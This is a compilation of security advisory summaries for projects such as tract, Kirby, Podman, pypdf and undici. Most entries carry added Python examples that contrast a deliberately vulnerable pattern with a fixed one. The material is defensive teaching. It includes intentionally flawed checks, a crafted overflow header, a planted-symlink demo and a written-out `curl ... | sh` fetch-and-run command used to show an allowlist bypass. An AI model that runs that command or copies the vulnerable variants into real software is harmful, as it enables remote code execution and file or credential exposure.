GHSA-X5MV-8WGW-29HG tract-nnef: integer overflow in NNEF `.dat` tensor parser yields an out-of-bounds read on model load
Component: tract-nnef nnef/src/tensors.rs::read_tensor + tract-data data/src/tensor.rs - Affected versions: 0.21.16, 0.22.0–0.22.2, 0.23.0–0.23.1 — the dense DatLoader path was unguarded across all three release lines; patched in 0.21.16 / 0.22.2 / 0.23.1 - Class: CWE-190 integer overflow →...
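The failure mode behind this entry, as an added illustration rather than tract's own code: a shape whose element count multiplied by the element size wraps past 64 bits produces a tiny "needed bytes" figure, so the length check against the payload passes while the consumer still iterates over the unwrapped element count. Python integers do not overflow, so the unchecked path is emulated with an explicit modulo 2**64 mask; the header and payload are constructed here.

```python
# Added example (not tract's code): how a wrapped 64-bit size check lets a tensor
# header describe far more elements than the .dat payload actually holds.
from typing import Sequence

U64_MAX = (1 << 64) - 1


def wrapping_byte_size(shape: Sequence[int], elem_size: int) -> int:
    """Unchecked arithmetic: every multiply wraps modulo 2**64, as a plain
    usize product would on a 64-bit target."""
    n = 1
    for d in shape:
        n = (n * d) & U64_MAX
    return (n * elem_size) & U64_MAX


def checked_byte_size(shape: Sequence[int], elem_size: int) -> int:
    """Checked arithmetic: refuse any header whose element count or byte size
    does not fit in 64 bits (the equivalent of a checked_mul chain)."""
    n = 1
    for d in shape:
        if d < 0:
            raise ValueError("negative dimension")
        n *= d
        if n > U64_MAX:
            raise OverflowError("element count overflows u64")
    n *= elem_size
    if n > U64_MAX:
        raise OverflowError("byte size overflows u64")
    return n


def load_dense_vulnerable(shape: Sequence[int], elem_size: int, payload: bytes) -> int:
    """Vulnerable loader: the length check uses the wrapped size, so it passes;
    it then returns the unwrapped element count a consumer would iterate over,
    reading far past the end of `payload`."""
    if len(payload) < wrapping_byte_size(shape, elem_size):
        raise ValueError("truncated payload")
    count = 1
    for d in shape:
        count *= d
    return count


def load_dense_fixed(shape: Sequence[int], elem_size: int, payload: bytes) -> int:
    """Fixed loader: overflow is an error, and the byte count checked against
    the payload is the true one. Returns the element count."""
    need = checked_byte_size(shape, elem_size)
    if len(payload) < need:
        raise ValueError("truncated payload")
    return need // elem_size


def rejects(fn, *args):
    """Return the name of the exception a call raises, or None if it succeeds."""
    try:
        fn(*args)
    except (OverflowError, ValueError) as exc:
        return type(exc).__name__
    return None


# Constructed header: two dimensions of 2**32 with 4-byte elements multiply to
# exactly 2**64 bytes, which wraps to 0 and satisfies any length check.
MALICIOUS_SHAPE = [1 << 32, 1 << 32]
TINY_PAYLOAD = b"\x00" * 16
```

The same shape passes the unchecked loader with a 16-byte payload and is refused outright by the checked one; a legitimate small tensor is accepted by both only when the payload really is large enough.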
GHSA-W5CV-PW74-4RXC opentelemetry-collector-contrib: githubreceiver silently ignores configured required_headers authentication
Summary: The githubreceiver webhook handler does not enforce the required_headers configuration. Headers are validated at startup (the config rejects empty keys/values) but never checked on incoming requests. This follows the same...
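What per-request enforcement of such a setting looks like, as an added example that is not the collector's code: the configuration is validated once at startup, and then every request is checked against it before the payload is touched. The header names and values are constructed for the demonstration.

```python
# Added example, not the opentelemetry-collector-contrib code: a webhook handler that
# enforces its required_headers configuration on every request, not only at startup.
import hmac
from typing import Mapping


class RequiredHeaders:
    def __init__(self, required: Mapping[str, str]):
        # Startup validation, which is all the vulnerable receiver did: reject
        # empty names or values so a misconfiguration fails fast.
        for name, value in required.items():
            if not name.strip() or not value:
                raise ValueError("required_headers entries must be non-empty")
        # Header names are case-insensitive; normalize once so lookups are too.
        self._required = {name.strip().lower(): value for name, value in required.items()}

    def check(self, request_headers: Mapping[str, str]) -> tuple:
        """Per-request enforcement: every configured header must be present
        with exactly the configured value. Returns (ok, reason)."""
        received = {name.lower(): value for name, value in request_headers.items()}
        for name, expected in self._required.items():
            actual = received.get(name)
            if actual is None:
                return False, "missing required header " + name
            # Constant-time comparison: the value is effectively a shared secret.
            if not hmac.compare_digest(actual.encode(), expected.encode()):
                return False, "required header " + name + " has the wrong value"
        return True, "ok"


def handle_webhook(policy: RequiredHeaders, request_headers: Mapping[str, str], body: bytes) -> int:
    """Return the HTTP status the receiver should answer with."""
    ok, _reason = policy.check(request_headers)
    if not ok:
        return 401            # reject before parsing the payload
    _ = body                  # a real receiver would parse and emit telemetry here
    return 200


# Constructed configuration for the demonstration.
POLICY = RequiredHeaders({"X-Hook-Token": "s3cret-token", "X-Tenant": "acme"})
```

A request with no headers, a wrong value, or only one of the two configured headers is rejected; the correct pair is accepted regardless of header-name casing.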
GHSA-R3W8-2C5R-H9J9 Kirby: `pages.access` permission is not checked in the `site/find` REST API route
TL;DR: This vulnerability affects all Kirby sites where users of a particular role have no permission to access pages (the pages.access permission is disabled). This can be due to configuration in the user blueprints, options in the model blueprints, or a combination of both settings. It was possible to...
GHSA-WHXW-24JC-CWMV Kirby: External Initialization of the Panel on reverse proxy setups with the `Forwarded` header
TL;DR: This vulnerability affects Kirby sites that have no configured user accounts and are running on publicly accessible servers behind a reverse proxy that sets the Forwarded: for=..., X-Client-IP, or X-Real-IP request header. It was possible to install the Panel (= create the first admin user) i...
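The shape of the check involved, as an added example that is not Kirby's code: behind a reverse proxy the TCP peer is the proxy itself, often on loopback, so a "local request" decision must also read every header through which the proxy reports the real client. The approach assumed here treats a request as local only when the peer address and every reported client address are loopback; the vulnerable variant only consults X-Forwarded-For, the fixed one also parses Forwarded (RFC 7239 `for=` pairs), X-Real-IP, X-Client-IP and Client-IP. Sample addresses are constructed.

```python
# Added example, not Kirby's code: deciding whether a request really comes from
# localhost when the application sits behind a reverse proxy.
import ipaddress
import re
from typing import Iterable, Mapping

# Headers that carry the original client address. The vulnerable pattern described
# in the advisory only consulted the first one.
LEGACY_HEADERS = ("x-forwarded-for",)
ALL_HEADERS = ("x-forwarded-for", "x-real-ip", "x-client-ip", "client-ip")

# RFC 7239 `for=` pairs: for=203.0.113.9, for="[2001:db8::1]:443", for="203.0.113.9:1234"
_FOR_PAIR = re.compile(r'\bfor\s*=\s*"?\[?([^\]";,]+)\]?', re.IGNORECASE)


def _strip_port(addr: str) -> str:
    addr = addr.strip()
    if addr.count(":") == 1:              # IPv4:port; IPv6 literals contain several colons
        addr = addr.split(":", 1)[0]
    return addr


def _is_loopback(addr: str) -> bool:
    try:
        return ipaddress.ip_address(_strip_port(addr)).is_loopback
    except ValueError:
        return False                      # unparsable or obfuscated identifier: never local


def reported_client_addrs(headers: Mapping[str, str], names: Iterable[str], parse_forwarded: bool) -> list:
    """Collect every client address the forwarding headers claim."""
    lowered = {k.lower(): v for k, v in headers.items()}
    addrs = []
    for name in names:
        if name in lowered:
            addrs.extend(a.strip() for a in lowered[name].split(",") if a.strip())
    if parse_forwarded and "forwarded" in lowered:
        addrs.extend(m.group(1) for m in _FOR_PAIR.finditer(lowered["forwarded"]))
    return addrs


def is_local_vulnerable(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """Only checks the peer address and X-Forwarded-For."""
    if not _is_loopback(remote_addr):
        return False
    return all(_is_loopback(a) for a in reported_client_addrs(headers, LEGACY_HEADERS, False))


def is_local_fixed(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """Also honours Forwarded, X-Real-IP, X-Client-IP and Client-IP."""
    if not _is_loopback(remote_addr):
        return False
    return all(_is_loopback(a) for a in reported_client_addrs(headers, ALL_HEADERS, True))
```

With the proxy on 127.0.0.1 and the real client reported only through Forwarded or X-Real-IP, the vulnerable check still says "local"; the fixed check does not. An unparsable `for=` token (RFC 7239 allows obfuscated identifiers) is deliberately treated as non-local.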
GHSA-WR9H-4R83-F4V6 Kirby: Cross-site scripting (XSS) from incomplete HTML/XML sanitization in `Dom::sanitize()`
TL;DR: This vulnerability affects Kirby sites and plugins that use the writer or list fields or that use $dom->sanitize(), Sane::sanitize(), Sane\Html::sanitize(), Sane\Svg::sanitize(), Sane\Xml::sanitize(), Sane::sanitizeFile() or $file->sanitizeContents() with untrusted input. It was possible to inject maliciou...
GHSA-RHJ6-R49H-5932 Kirby: Self cross-site scripting (self-XSS) in the writer field
TL;DR: This vulnerability affects Kirby sites that use the writer field in any blueprint. It was possible to include a scripting link as the target of a link or email link. This link target would then be clickable by the user who entered it. A successful attack commonly requires knowledge of the...
GHSA-RVP7-W75Q-9FV2 BBOT: Symlink-Following Arbitrary Write via github_workflows Module
The github_workflows module constructs local directory paths from user-controlled repository names without validating for symlinks. A local attacker sharing the scan directory can plant a symlink at the predictable output path, causing workflow data to be written to an attacker-chosen location...
GHSA-C226-Q6FX-6J6C OpenClaw: macOS Swift exec allowlist missed combined POSIX inline flags
Summary: In affected versions, the exec allowlist could miss inline-command content when a command request expressed the inline-command flag as part of a combined POSIX short-flag group. This advisory is scoped to the named feature and configuration. It does not...
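An added example of the parsing gap the entry describes, not OpenClaw's code: an allowlist that extracts the inline command from a shell invocation by looking only for a bare `-c` token never sees the command string behind `sh -xc '...'`, so the allowlist is evaluated against `sh` alone. The assumptions are that the shells listed are the ones being policed, that `-c` is the inline-command flag, and that `sh` itself is on the constructed allowlist (otherwise the bypass would not be visible).

```python
# Added example, not OpenClaw's code: an exec allowlist that extracts the inline
# command from a shell invocation, handling combined short flags.
import os
import shlex
from typing import Callable, Optional

SHELLS = {"sh", "bash", "zsh", "dash"}                 # assumed set of policed shells
ALLOWED_PROGRAMS = {"sh", "bash", "ls", "cat", "echo"} # constructed allowlist
OPERATORS = {";", "&&", "||", "|", "&"}


def inline_command_naive(argv: list) -> Optional[str]:
    """Only recognises a bare `-c` token: `sh -xc '...'` is not seen as inline."""
    if not argv or os.path.basename(argv[0]) not in SHELLS:
        return None
    for i, tok in enumerate(argv[1:], start=1):
        if tok == "-c" and i + 1 < len(argv):
            return argv[i + 1]
    return None


def inline_command(argv: list) -> Optional[str]:
    """Handles combined short flags (-xc, -lc, -ec), `-o name`, long options
    and `--`; the command string is the first operand when `c` was set."""
    if not argv or os.path.basename(argv[0]) not in SHELLS:
        return None
    has_c = False
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok == "--":
            i += 1
            break
        if len(tok) > 1 and tok[0] in "-+":
            if not tok.startswith("--"):
                flags = tok[1:]
                has_c = has_c or "c" in flags
                if flags.endswith("o") and i + 1 < len(argv):
                    i += 1                       # -o takes the option name as its argument
            i += 1
            continue
        break                                    # first operand
    return argv[i] if has_c and i < len(argv) else None


def programs_in(command: str) -> list:
    """Program names at the start of each pipeline stage or list element."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    programs, expect_program = [], True
    for tok in lexer:
        if tok in OPERATORS:
            expect_program = True
        elif expect_program:
            programs.append(os.path.basename(tok))
            expect_program = False
    return programs


def is_allowed(argv: list, extractor: Callable[[list], Optional[str]]) -> bool:
    """Allow the request only if every program that would run is allowlisted."""
    inline = extractor(argv)
    programs = programs_in(inline) if inline is not None else [os.path.basename(argv[0])]
    return all(p in ALLOWED_PROGRAMS for p in programs)
```

With the naive extractor, `/bin/sh -xc 'curl http://example.test | sh'` is judged by `sh` alone and allowed; the combined-flag extractor surfaces `curl` and the request is denied.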
GHSA-PMF8-G7C8-7V54 Grav: Stored CSS injection via Markdown image ?style=… reaches MediaObjectTrait::style() — incomplete patch of GHSA-r7fx-8g49-7hhr
Summary: The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction), but the sibling MediaObjectTrait::style() meth...
GHSA-2FJJ-QQG8-FG7X praisonai-platform: Authorization Bypass Through User-Controlled Key
Summary: The issue create and update endpoints in praisonai-platform accept a project_id in the request body and persist it without validating that the project belongs to the URL workspace. A user who is a member of workspace WB and has no access to workspace WA can create issues that reference a...
GHSA-2F86-9CP8-6HCF Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets
Summary: An authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including user/accounts/admin.yaml with the admin's bcrypt password hash and email, plus user/config/ with all site configuration. The download endpoint requires...
GHSA-J99Q-93C9-H869 MCPVault: PathFilter restricted-directory deny-list bypass via case and trailing dot/space equivalence
On case-insensitive filesystems (macOS, Windows), PathFilter compiled its deny-list patterns case-sensitively and matched the path verbatim, so names like .Git/config, .GIT/config, or .oBsIdIaN/secrets.md slipped past the .git/.obsidian/node_modules restriction while the OS opened the real file. On...
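The general fix, as an added example rather than MCPVault's code: normalise each path segment the way the target filesystem will before comparing it with the deny-list, which means unifying separators, resolving `.` and `..`, dropping trailing dots and spaces (Windows ignores them) and folding case. The restricted directory names are the three the entry mentions.

```python
# Added example, not MCPVault's code: a restricted-directory check that normalises
# each path segment the way the host filesystem will before matching.
from typing import Iterable

RESTRICTED_DIRS = {".git", ".obsidian", "node_modules"}   # constructed deny-list


def canonical_segments(rel_path: str, case_insensitive: bool = True, windows_names: bool = True) -> list:
    """Split a relative path into the segments the OS will actually look up:
    separators unified, `.` dropped, `..` resolved, trailing dots/spaces removed
    and case folded."""
    segments = []
    for seg in rel_path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        if windows_names:
            seg = seg.rstrip(". ")
            if not seg:
                continue
        if case_insensitive:
            seg = seg.casefold()
        segments.append(seg)
    return segments


def denied_verbatim(rel_path: str, restricted: Iterable[str] = RESTRICTED_DIRS) -> bool:
    """The vulnerable shape: case-sensitive comparison of the raw segments."""
    restricted = set(restricted)
    return any(seg in restricted for seg in rel_path.replace("\\", "/").split("/"))


def denied(rel_path: str, restricted: Iterable[str] = RESTRICTED_DIRS) -> bool:
    """Compare canonical segments against the case-folded deny-list."""
    restricted_c = {name.casefold() for name in restricted}
    return any(seg in restricted_c for seg in canonical_segments(rel_path))
```

String normalisation is the first line of defence; on a real case-insensitive volume the check should additionally open the file and confirm with os.path.realpath or os.path.samefile that what was opened is what the normalised name says, so the filter and the OS agree on the target.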
GHSA-JM82-FX9C-MX94 pypdf: Missing stream length values ignore defined limits
Impact: An attacker who uses this vulnerability can craft a PDF which leads to large memory usage, as MAXDECLAREDSTREAMLENGTH is sometimes ignored. This requires parsing a content stream without a /Length value. Patches: This has been fixed in pypdf==6.13.3. Workarounds: If you cannot upgrade yet,...
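The pattern described, shown as an added example that is not pypdf's code: a stream reader whose size cap is only applied when the dictionary declares /Length, beside one that also bounds the fallback scan for `endstream`. The cap value, the helper names and the test objects are this example's own.

```python
# Added example, not pypdf's code: reading a PDF stream body with a size cap that
# applies whether or not the stream dictionary declares /Length.
import re

MAX_STREAM_LENGTH = 1024                       # assumed cap, kept small for the demo

_LENGTH_RE = re.compile(rb"/Length\s+(\d+)")
_STREAM_RE = re.compile(rb"stream\r?\n")
_ENDSTREAM = b"endstream"


def _strip_eol(data: bytes) -> bytes:
    """The EOL before `endstream` is not part of the stream data."""
    if data.endswith(b"\r\n"):
        return data[:-2]
    if data.endswith(b"\n") or data.endswith(b"\r"):
        return data[:-1]
    return data


def _locate(obj: bytes):
    """Return (body_start, declared_length_or_None)."""
    m = _STREAM_RE.search(obj)
    if not m:
        raise ValueError("no stream keyword")
    length = _LENGTH_RE.search(obj, 0, m.start())
    return m.end(), (int(length.group(1)) if length else None)


def read_stream_vulnerable(obj: bytes) -> bytes:
    """Enforces the cap only when /Length is declared; without it, scans to
    `endstream` with no bound, so the body can be as large as the file."""
    start, declared = _locate(obj)
    if declared is not None:
        if declared > MAX_STREAM_LENGTH:
            raise ValueError("declared /Length exceeds limit")
        return obj[start:start + declared]
    end = obj.find(_ENDSTREAM, start)
    if end < 0:
        raise ValueError("unterminated stream")
    return _strip_eol(obj[start:end])


def read_stream_fixed(obj: bytes) -> bytes:
    """Enforces the cap on both paths: the scan for `endstream` is bounded and
    the recovered body is re-checked against the limit."""
    start, declared = _locate(obj)
    if declared is not None:
        if declared > MAX_STREAM_LENGTH:
            raise ValueError("declared /Length exceeds limit")
        return obj[start:start + declared]
    # Bounded scan: body, at most two EOL bytes, then the keyword itself.
    window_end = start + MAX_STREAM_LENGTH + 2 + len(_ENDSTREAM)
    end = obj.find(_ENDSTREAM, start, window_end)
    if end < 0:
        raise ValueError("stream exceeds limit or is unterminated")
    data = _strip_eol(obj[start:end])
    if len(data) > MAX_STREAM_LENGTH:
        raise ValueError("stream exceeds limit")
    return data


def build_stream_object(payload: bytes, declare_length: bool) -> bytes:
    """Constructed test object: a minimal dictionary followed by the stream."""
    head = b"<< /Length %d >>" % len(payload) if declare_length else b"<< >>"
    return head + b"\nstream\n" + payload + b"\nendstream"
```

A body one byte over the cap is rejected by both readers when /Length is declared; without /Length only the fixed reader rejects it, which is exactly the gap the entry describes.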
GHSA-Q6R4-3WMG-FWCQ Podman: WORKDIR symlink traversal vulnerability
Summary: Running a malicious container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree durin...
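Both the BBOT entry above and this Podman entry come down to building a path from untrusted names and letting the filesystem follow a planted symlink. One added example serves both; it is not code from either project. It creates a directory chain under a root one component at a time, refusing any component that lstat reports as a symlink, writes the file with O_NOFOLLOW, and compares the outcome with the naive makedirs+open pattern against a symlink planted in a temporary directory. All names and paths are constructed.

```python
# Added example serving the BBOT and Podman entries; not code from either project.
# Symlink-safe directory creation and file write below a root directory.
import errno
import os
import stat
import tempfile


class UnsafePath(Exception):
    """Raised when a path component is a symlink, a non-directory, or escapes root."""


def safe_mkdir_under(root: str, rel: str) -> str:
    """Create `rel` below `root` one component at a time. Each existing component
    must be a real directory (lstat, so symlinks are rejected rather than followed)."""
    root = os.path.realpath(root)
    current = root
    for seg in rel.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            raise UnsafePath("parent traversal in %r" % rel)
        current = os.path.join(current, seg)
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            os.mkdir(current, 0o700)
            continue
        if stat.S_ISLNK(st.st_mode):
            raise UnsafePath("symlink in path: %s" % current)
        if not stat.S_ISDIR(st.st_mode):
            raise UnsafePath("not a directory: %s" % current)
    if os.path.commonpath([root, os.path.realpath(current)]) != root:
        raise UnsafePath("escapes root: %s" % current)
    return current


def safe_write_under(root: str, rel: str, data: bytes) -> str:
    """Write `data` to root/rel with symlink-free directories and O_NOFOLLOW on the file."""
    rel_dir, name = os.path.split(rel.replace("\\", "/"))
    if not name or name in (".", ".."):
        raise UnsafePath("bad file name in %r" % rel)
    target_dir = safe_mkdir_under(root, rel_dir) if rel_dir else os.path.realpath(root)
    path = os.path.join(target_dir, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError as exc:
        if exc.errno == errno.ELOOP:       # the final component itself is a symlink
            raise UnsafePath("refusing to follow symlink at %s" % path) from exc
        raise
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def naive_write_under(root: str, rel: str, data: bytes) -> str:
    """The vulnerable pattern: makedirs follows a planted symlink, open writes through it."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Plant a symlink at the predictable output path and compare both writers."""
    with tempfile.TemporaryDirectory() as tmp:
        scan_dir = os.path.join(tmp, "scan")      # shared, attacker-writable output directory
        victim_dir = os.path.join(tmp, "victim")  # where the attacker wants the write to land
        os.makedirs(scan_dir)
        os.makedirs(victim_dir)
        # Attacker-chosen name "evil-repo" yields the predictable path scan/evil-repo.
        os.symlink(victim_dir, os.path.join(scan_dir, "evil-repo"))

        naive_write_under(scan_dir, "evil-repo/workflows.yml", b"constructed workflow data")
        naive_escaped = os.path.isfile(os.path.join(victim_dir, "workflows.yml"))

        try:
            safe_write_under(scan_dir, "evil-repo/workflows.yml", b"constructed workflow data")
            safe_blocked = False
        except UnsafePath:
            safe_blocked = True

        good = safe_write_under(scan_dir, "good-repo/workflows.yml", b"constructed workflow data")
        good_written = os.path.isfile(good) and good.startswith(os.path.realpath(scan_dir))
        return {"naive_escaped": naive_escaped, "safe_blocked": safe_blocked, "good_written": good_written}
```

The lstat-then-mkdir sequence still leaves a small race window against an attacker who can swap a component between the two calls; on platforms that support it, opening each directory with O_DIRECTORY|O_NOFOLLOW and creating the next component relative to that descriptor (os.mkdir and os.open with dir_fd) closes that window.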
GHSA-VMH5-MC38-953G undici vulnerable to TLS certificate validation bypass via dropped requestTls in SOCKS5 ProxyAgent
Impact: undici's ProxyAgent silently drops the requestTls option when configured with a SOCKS5 proxy URI (socks5:// or socks://). The target HTTPS connection through the SOCKS5 tunnel falls back to Node's default trust store, ignoring user-configured ca, cert, key, rejectUnauthorized, and servername...
GHSA-PR7R-676H-XCF6 undici vulnerable to cross-user information disclosure via shared cache whitespace bypass
Impact: Undici's cache interceptor incorrectly classifies some responses as cacheable when the upstream Cache-Control header uses whitespace-padded qualified private or no-cache field names such as private=" authorization" or no-cache="\tauthorization". The parser preserves the surrounding...
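What the qualified forms mean for a shared cache and where the padding bites, as an added example that is not undici's code: `private="authorization"` says the response may be stored once the named header is removed, so a parser that keeps the padding looks for a header literally named " authorization", finds none, and stores the Authorization value for the next user. The parser here splits on commas outside quotes, lowercases directive names, and trims the quoted field names only when asked to, so both behaviours can be compared on a constructed upstream response.

```python
# Added example, not undici's code: Cache-Control parsing for a shared cache where
# qualified private / no-cache directives name headers that must be stripped before
# the response is stored.
from typing import Optional


def split_directives(value: str) -> list:
    """Split on commas that are outside double quotes."""
    parts, buf, in_quotes = [], [], False
    for ch in value:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "," and not in_quotes:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p for p in parts if p.strip()]


def parse_cache_control(value: str, trim_field_names: bool) -> dict:
    """Map directive -> list of qualified field names, or None when unqualified."""
    directives = {}
    for part in split_directives(value):
        name, _, arg = part.partition("=")
        name = name.strip().lower()
        if not name:
            continue
        arg = arg.strip()
        if len(arg) >= 2 and arg[0] == '"' and arg[-1] == '"':
            arg = arg[1:-1]
        if arg == "":
            directives[name] = None
            continue
        fields = arg.split(",")
        # The bug: keeping the padding means " authorization" never equals "authorization".
        directives[name] = [(f.strip() if trim_field_names else f).lower() for f in fields]
    return directives


def store_in_shared_cache(response_headers: dict, trim_field_names: bool = True) -> Optional[dict]:
    """Return the header set a shared cache may store, or None if it must not store."""
    headers = {k.lower(): v for k, v in response_headers.items()}
    cc = parse_cache_control(headers.get("cache-control", ""), trim_field_names)
    if "no-store" in cc:
        return None
    for directive in ("private", "no-cache"):
        if directive not in cc:
            continue
        fields = cc[directive]
        if fields is None:
            return None          # unqualified private / no-cache: not reusable from a shared cache
        for field in fields:     # qualified: storable once the named headers are removed
            headers.pop(field, None)
    return headers


# Constructed upstream response that carries a per-user credential header.
UPSTREAM_RESPONSE = {
    "Cache-Control": 'private=" authorization", max-age=60',
    "Authorization": "Bearer token-of-user-a",
    "Content-Type": "text/plain",
}
```

With trimming off, the stored entry still contains the Authorization header and would be served to the next client; with trimming on, the header is stripped and the rest of the response is cached as intended.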